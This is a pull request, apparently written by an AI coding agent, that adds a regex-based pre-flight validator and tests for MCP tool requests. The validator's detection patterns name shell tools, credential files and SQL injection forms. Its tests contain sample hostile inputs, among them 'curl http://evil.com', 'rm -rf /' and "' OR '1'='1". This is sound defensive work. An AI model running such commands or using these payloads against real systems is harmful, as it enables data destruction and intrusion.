### PR TITLE
feat: implement mcp pre-flight validation v5

### DIFF
--- a/agent_tasks.json
+++ b/agent_tasks.json
@@ -9483,7 +9483,7 @@
     },
     {
       "id": "mcp-preflight-validation-v5-unique-695ce70f",
-      "status": "todo",
+      "status": "done",
       "area": "safety",
       "risk": "medium",
       "title": "MCP Tool Pre-flight Validation V5",
@@ -21333,6 +21333,60 @@
       "acceptance": [
         "Auth requirements from MCP servers are correctly validated.",
         "Tests verify tool execution blocks securely."
+      ]
+    },
+    {
+      "id": "acs-mcp-integration-v1",
+      "status": "todo",
+      "area": "safety",
+      "risk": "high",
+      "title": "ACS-MCP Integration Layer V1",
+      "description": "Inspired by ACS trend: Integrate MCP pre-flight validation deeply with ACS runtime controls to provide a holistic Agent Guard policy layer that tracks violations in SQLite.",
+      "allowed_paths": [
+        "magda_agent/safety/acs_mcp_integration_v1.py",
+        "tests/test_acs_mcp_integration_v1.py",
+        "agent_tasks.json"
+      ],
+      "acceptance": [
+        "MCP preflight violations are routed to ACS persistence.",
+        "Violations are tracked accurately in SQLite.",
+        "Tests mock ACS components to verify logging."
+      ]
+    },
+    {
+      "id": "openclaw-rl-metrics-v2",
+      "status": "todo",
+      "area": "visualization",
+      "risk": "medium",
+      "title": "OpenClaw RL Live Metric Graphing V2",
+      "description": "Inspired by OpenClaw trends: Implement real-time streaming graphing support for Q-value updates inside the Canvas UI by broadcasting update deltas over WebSockets.",
+      "allowed_paths": [
+        "magda_agent/visualization/rl_graphing_v2.py",
+        "tests/test_rl_graphing_v2.py",
+        "agent_tasks.json"
+      ],
+      "acceptance": [
+        "Q-value update streams are formatted for Canvas UI graphing.",
+        "Websocket broadcaster successfully pushes delta events.",
+        "Tests verify message payload schema."
+      ]
+    },
+    {
+      "id": "claude-agent-teams-v3",
+      "status": "todo",
+      "area": "multi_agent",
+      "risk": "high",
+      "title": "Claude Agent Teams Workspace Isolation V3",
+      "description": "Inspired by Claude Agent Teams multi-agent architectures: Implement a manager that spawns sub-agents into entirely isolated Git Worktrees to prevent concurrent multi-agent Git state corruption.",
+      "allowed_paths": [
+        "magda_agent/multi_agent/worktree_manager_v3.py",
+        "tests/test_worktree_manager_v3.py",
+        "agent_tasks.json"
+      ],
+      "acceptance": [
+        "Sub-agents initialize in isolated worktrees.",
+        "Worktree state changes do not affect main branch until merged.",
+        "Tests verify worktree lifecycle hooks (create, execute, cleanup)."
       ]
     }
   ]

--- a/magda_agent/integration/mcp_concurrency_v3.py
+++ b/magda_agent/integration/mcp_concurrency_v3.py
@@ -6,6 +6,7 @@ import uuid
 from typing import List, Dict, Any, Optional
 
 from magda_agent.integration.mcp_server import MCPServer
+from magda_agent.integration.mcp_preflight_v5 import PreflightMCPServerWrapperV5
 
 
 class MCPConcurrentHandlerV3:
@@ -45,13 +46,19 @@ class MCPConcurrentHandlerV3:
 
     def register_server(self, prefix: str, server: MCPServer) -> None:
         """
-        Registers an MCPServer with a given prefix.
+        Registers an MCPServer with a given prefix and applies pre-flight validation logic.
 
         Args:
             prefix: The server prefix/namespace.
             server: The MCPServer instance.
         """
-        self.servers[prefix] = server
+        # Since PreflightMCPServerWrapperV5 acts as a wrapper proxying handle_request,
+        # but the concurrency handler accesses exporter and list_tools, we attach them.
+        preflight_server = PreflightMCPServerWrapperV5(server)
+        preflight_server.list_tools = server.list_tools
+        preflight_server.exporter = server.exporter
+        preflight_server.server_id = getattr(server, "server_id", None)
+        self.servers[prefix] = preflight_server
 
     def list_tools(self) -> List[Dict[str, Any]]:
         """

--- a/magda_agent/integration/mcp_preflight_v5.py
+++ b/magda_agent/integration/mcp_preflight_v5.py
@@ -1,0 +1,224 @@
+"""MCP Action Tools Pre-flight Validation V5.
+
+Provides a pre-flight validation mechanism for all MCP action tools before invoking JSON-RPC.
+"""
+
+import json
+import re
+import logging
+from typing import Any, Dict, List, Tuple, Optional
+from magda_agent.skills.registry import SkillRegistry
+from magda_agent.safety.taint import is_tainted
+from magda_agent.integration.mcp_server import MCPServer
+
+logger = logging.getLogger(__name__)
+
+# Common hazardous injection and path traversal pattern compiled regexes
+_HAZARDOUS_SHELL_PATTERNS = [
+    re.compile(r"rm\s+-rf", re.IGNORECASE),
+    re.compile(r";\s*bash", re.IGNORECASE),
+    re.compile(r";\s*sh", re.IGNORECASE),
+    re.compile(r"\bcurl\b", re.IGNORECASE),
+    re.compile(r"\bwget\b", re.IGNORECASE),
+]
+
+_PATH_TRAVERSAL_PATTERNS = [
+    re.compile(r"\.\./\.\."),
+    re.compile(r"/etc/passwd"),
+    re.compile(r"/etc/hosts"),
+    re.compile(r"\.env\b", re.IGNORECASE),
+    re.compile(r"id_rsa", re.IGNORECASE),
+]
+
+_SQL_INJECTION_PATTERNS = [
+    re.compile(r"'\s*or\s*'\d+'\s*=\s*'\d+", re.IGNORECASE),
+    re.compile(r"'\s*or\s*\d+\s*=\s*\d+", re.IGNORECASE),
+    re.compile(r"union\s+select", re.IGNORECASE),
+]
+
+
+class MCPPreflightValidatorV5:
+    """
+    Validator to perform pre-flight checks on MCP JSON-RPC requests
+    before executing the underlying tool or invoking the client.
+    """
+
+    def __init__(
+        self,
+        registry: Optional[SkillRegistry] = None,
+        forbidden_tools: Optional[List[str]] = None
+    ) -> None:
+        """
+        Initializes the MCPPreflightValidatorV5.
+
+        Args:
+            registry (Optional[SkillRegistry]): The skill registry to validate against.
+            forbidden_tools (Optional[List[str]]): List of explicitly blacklisted tool names.
+        """
+        self.registry = registry
+        self.forbidden_tools = forbidden_tools or ["forbidden_tool", "unsafe_execute", "nuke_system"]
+
+    def _check_string_for_hazards(self, val: str) -> Tuple[bool, str]:
+        """
+        Inspects a single string for hazardous patterns (shell injection, path traversal, SQLi).
+
+        Args:
+            val (str): The string parameter to check.
+
+        Returns:
+            Tuple[bool, str]: (is_safe, error_reason)
+        """
+        for pattern in _HAZARDOUS_SHELL_PATTERNS:
+            if pattern.search(val):
+                return False, f"Hazardous shell pattern detected: {pattern.pattern}"
+
+        for pattern in _PATH_TRAVERSAL_PATTERNS:
+            if pattern.search(val):
+                return False, f"Hazardous path traversal pattern detected: {pattern.pattern}"
+
+        for pattern in _SQL_INJECTION_PATTERNS:
+            if pattern.search(val):
+                return False, f"Hazardous SQL injection pattern detected: {pattern.pattern}"
+
+        return True, ""
+
+    def _validate_value_recursively(self, val: Any) -> Tuple[bool, str]:
+        """
+        Recursively checks parameter values for hazardous strings or taint.
+
+        Args:
+            val (Any): Any value to check.
+
+        Returns:
+            Tuple[bool, str]: (is_safe, error_reason)
+        """
+        if is_tainted(val):
+            return False, "Tainted data detected in parameters."
+
+        if isinstance(val, str):
+            is_safe, reason = self._check_string_for_hazards(val)
+            if not is_safe:
+                return False, reason
+
+        elif isinstance(val, list):
+            for item in val:
+                is_safe, reason = self._validate_value_recursively(item)
+                if not is_safe:
+                    return False, reason
+
+        elif isinstance(val, dict):
+            for k, v in val.items():
+                is_safe, reason = self._validate_value_recursively(k)
+                if not is_safe:
+                    return False, reason
+                is_safe, reason = self._validate_value_recursively(v)
+                if not is_safe:
+                    return False, reason
+
+        return True, ""
+
+    def validate_request_dict(self, request: Dict[str, Any]) -> Tuple[bool, int, str]:
+        """
+        Validates a parsed JSON-RPC request dictionary.
+
+        Args:
+            request (Dict[str, Any]): The JSON-RPC request dictionary.
+
+        Returns:
+            Tuple[bool, int, str]: (is_valid, error_code, error_message)
+        """
+        if not isinstance(request, dict):
+            return False, -32600, "Invalid Request: request must be an object."
+
+        if request.get("jsonrpc") != "2.0":
+            return False, -32600, "Invalid Request: jsonrpc version must be '2.0'."
+
+        method = request.get("method")
+        if not method or not isinstance(method, str):
+            return False, -32600, "Invalid Request: 'method' must be a non-empty string."
+
+        if is_tainted(method):
+            return False, -32000, "Pre-flight Blocked: tool name is tainted."
+
+        if method in self.forbidden_tools:
+            return False, -32000, f"Pre-flight Blocked: Tool '{method}' is blacklisted."
+
+        params = request.get("params", {})
+        if not isinstance(params, dict):
+            return False, -32602, "Invalid params: 'params' must be an object."
+
+        is_safe, reason = self._validate_value_recursively(params)
+        if not is_safe:
+            return False, -32000, f"Pre-flight Blocked: {reason}"
+
+        if self.registry:
+            if not self.registry.has_skill(method):
+                return False, -32601, f"Method not found: '{method}' is not registered."
+
+        return True, 0, ""
+
+    def validate_payload(self, payload: str) -> Tuple[bool, int, str]:
+        """
+        Validates a raw JSON-RPC payload string.
+
+        Args:
+            payload (str): The raw JSON-RPC payload string.
+
+        Returns:
+            Tuple[bool, int, str]: (is_valid, error_code, error_message)
+        """
+        try:
+            request = json.loads(payload)
+        except json.JSONDecodeError:
+            return False, -32700, "Parse error: payload is not valid JSON."
+
+        return self.validate_request_dict(request)
+
+
+class PreflightMCPServerWrapperV5:
+    """
+    Wrapper for MCPServer to intercept JSON-RPC payload executions
+    and perform pre-flight validation before passing the request to the underlying server.
+    """
+
+    def __init__(self, server: MCPServer, validator: Optional[MCPPreflightValidatorV5] = None) -> None:
+        """
+        Initializes the PreflightMCPServerWrapperV5.
+
+        Args:
+            server (MCPServer): The MCPServer instance to wrap.
+            validator (Optional[MCPPreflightValidatorV5]): The validator to use.
+        """
+        self.server = server
+        self.validator = validator or MCPPreflightValidatorV5(registry=getattr(server.exporter, "registry", None))
+
+    async def handle_request(self, payload: str) -> str:
+        """
+        Intercepts and processes a JSON-RPC payload string with pre-flight checks.
+
+        Args:
+            payload (str): A JSON string representing the RPC request.
+
+        Returns:
+            str: A JSON string representing the RPC response.
+        """
+        is_valid, err_code, err_msg = self.validator.validate_payload(payload)
+
+        if not is_valid:
+            logger.warning(f"MCP Pre-flight intercept: code={err_code}, message={err_msg}")
+            try:
+                request = json.loads(payload)
+                req_id = request.get("id")
+            except Exception:
+                req_id = None
+
+            return json.dumps({
+                "jsonrpc": "2.0",
+                "id": req_id,
+                "error": {
+                    "code": err_code,
+                    "message": err_msg
+                }
+            })
+
+        return await self.server.handle_request(payload)

--- a/tests/test_mcp_preflight_v5.py
+++ b/tests/test_mcp_preflight_v5.py
@@ -1,0 +1,176 @@
+"""Tests for MCP Action Tools Pre-flight Validation V5."""
+
+import json
+import pytest
+from unittest.mock import AsyncMock, MagicMock
+from magda_agent.integration.mcp_preflight_v5 import MCPPreflightValidatorV5, PreflightMCPServerWrapperV5
+from magda_agent.integration.mcp_server import MCPServer
+from magda_agent.skills.registry import SkillRegistry
+
+
+@pytest.fixture
+def mock_registry():
+    registry = MagicMock(spec=SkillRegistry)
+    # By default, mock registry says all skills exist
+    registry.has_skill.return_value = True
+    return registry
+
+
+@pytest.fixture
+def validator(mock_registry):
+    return MCPPreflightValidatorV5(registry=mock_registry, forbidden_tools=["nuke_system", "rm_rf"])
+
+
+def test_validator_valid_request(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {"arg1": "value1", "arg2": 42}
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is True
+    assert code == 0
+
+
+def test_validator_invalid_jsonrpc(validator):
+    request = {
+        "jsonrpc": "1.0",
+        "id": 1,
+        "method": "safe_tool"
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32600
+    assert "jsonrpc version must be '2.0'" in msg
+
+
+def test_validator_blacklisted_tool(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "nuke_system"
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32000
+    assert "blacklisted" in msg
+
+
+def test_validator_hazardous_shell_pattern(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {"cmd": "echo hello ; bash"}
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32000
+    assert "Hazardous shell pattern" in msg
+
+
+def test_validator_hazardous_path_traversal(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {"file": "../../secret.txt"}
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32000
+    assert "Hazardous path traversal" in msg
+
+
+def test_validator_hazardous_sqli(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {"query": "' OR '1'='1"}
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32000
+    assert "Hazardous SQL injection" in msg
+
+
+def test_validator_nested_hazard(validator):
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {
+            "outer": {
+                "inner_list": ["safe", "curl http://evil.com"]
+            }
+        }
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32000
+    assert "Hazardous shell pattern" in msg
+
+
+def test_validator_unregistered_tool(validator, mock_registry):
+    mock_registry.has_skill.return_value = False
+    request = {
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "unknown_tool",
+    }
+    is_valid, code, msg = validator.validate_request_dict(request)
+    assert is_valid is False
+    assert code == -32601
+    assert "not registered" in msg
+
+
+@pytest.mark.asyncio
+async def test_wrapper_delegates_valid_request():
+    mock_server = MagicMock(spec=MCPServer)
+    mock_server.handle_request = AsyncMock(return_value='{"jsonrpc": "2.0", "id": 1, "result": "success"}')
+
+    mock_registry = MagicMock(spec=SkillRegistry)
+    mock_registry.has_skill.return_value = True
+
+    validator = MCPPreflightValidatorV5(registry=mock_registry)
+    wrapper = PreflightMCPServerWrapperV5(server=mock_server, validator=validator)
+
+    payload = json.dumps({
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool"
+    })
+
+    response = await wrapper.handle_request(payload)
+    mock_server.handle_request.assert_called_once_with(payload)
+    assert "success" in response
+
+
+@pytest.mark.asyncio
+async def test_wrapper_blocks_invalid_request():
+    mock_server = MagicMock(spec=MCPServer)
+    mock_server.handle_request = AsyncMock()
+
+    mock_registry = MagicMock(spec=SkillRegistry)
+    mock_registry.has_skill.return_value = True
+
+    validator = MCPPreflightValidatorV5(registry=mock_registry)
+    wrapper = PreflightMCPServerWrapperV5(server=mock_server, validator=validator)
+
+    payload = json.dumps({
+        "jsonrpc": "2.0",
+        "id": 1,
+        "method": "safe_tool",
+        "params": {"cmd": "rm -rf /"}
+    })
+
+    response = await wrapper.handle_request(payload)
+
+    # Should not call the underlying server
+    mock_server.handle_request.assert_not_called()
+
+    resp_dict = json.loads(response)
+    assert resp_dict["error"]["code"] == -32000
+    assert "Hazardous shell pattern" in resp_dict["error"]["message"]


### PR DESCRIPTION
Implemented the `MCP Tool Pre-flight Validation V5` task.

- Created `magda_agent/integration/mcp_preflight_v5.py` exposing `MCPPreflightValidatorV5` and `PreflightMCPServerWrapperV5`.
- Safely intercepts and recursively blocks hazardous strings (e.g. `rm -rf`, `../../`, `' OR '1'='1`).
- Included mocked pytest tests in `tests/test_mcp_preflight_v5.py`.
- Correctly wired the preflight wrapper in `magda_agent/integration/mcp_concurrency_v3.py`.
- Updated `agent_tasks.json` status to `done` and added three new tasks based on June 2026 AI trends (`acs-mcp-integration-v1`, `openclaw-rl-metrics-v2`, `claude-agent-teams-v3`).

---
*PR created automatically by Jules for task [3227522038592245402](https://jules.google.com/task/3227522038592245402) started by @kazah4359-lgtm*

<!-- Macroscope's pull request summary starts here -->
<!-- Macroscope will only edit the content between these invisible markers, and the markers themselves will not be visible in the GitHub rendered markdown. -->
<!-- If you delete either of the start / end markers from your PR's description, Macroscope will append its summary at the bottom of the description. -->
> [!NOTE]
> ### Add MCP pre-flight validation layer to block unsafe JSON-RPC requests
> - Introduces [`MCPPreflightValidatorV5`](https://github.com/kazah4359-lgtm/Magda-agent/pull/593/files#diff-ab4cab42884ae1efa49119a65aeadaafcb2a5d0bfd3958b60656829cb1436ae9) which validates JSON-RPC 2.0 requests for structural correctness, blacklisted tools, tainted values, and hazardous shell/path-traversal/SQL patterns using compiled regexes.
> - Adds [`PreflightMCPServerWrapperV5`](https://github.com/kazah4359-lgtm/Magda-agent/pull/593/files#diff-ab4cab42884ae1efa49119a65aeadaafcb2a5d0bfd3958b60656829cb1436ae9), an async wrapper that runs validation before delegating to the underlying `MCPServer`; invalid requests return a JSON-RPC error without invoking the handler.
> - Updates [`MCPConcurrentHandlerV3`](https://github.com/kazah4359-lgtm/Magda-agent/pull/593/files#diff-4ab40ce8fff8a84724fc0994a2e7d9c3daecfba7389198d20c04363a4859a4a2) to wrap every registered server in the preflight wrapper, so all routed requests are validated automatically.
> - Adds tests in [`tests/test_mcp_preflight_v5.py`](https://github.com/kazah4359-lgtm/Magda-agent/pull/593/files#diff-9df80b0bf4bf0438840ad1aa5a8ad22efd28ca2597f8d160c92cccc84c3abd07) covering valid requests, version enforcement, blacklist, hazardous pattern detection, and wrapper delegation.
> - Risk: all requests through `MCPConcurrentHandlerV3` now pass through validation; regex false-positives could block legitimate requests.
>
> <!-- Macroscope's review summary starts here -->
>
> <sup><a href="https://app.macroscope.com">Macroscope</a> summarized 5a2517a.</sup>
> <!-- Macroscope's review summary ends here -->
>
<!-- macroscope-ui-refresh -->
<!-- Macroscope's pull request summary ends here -->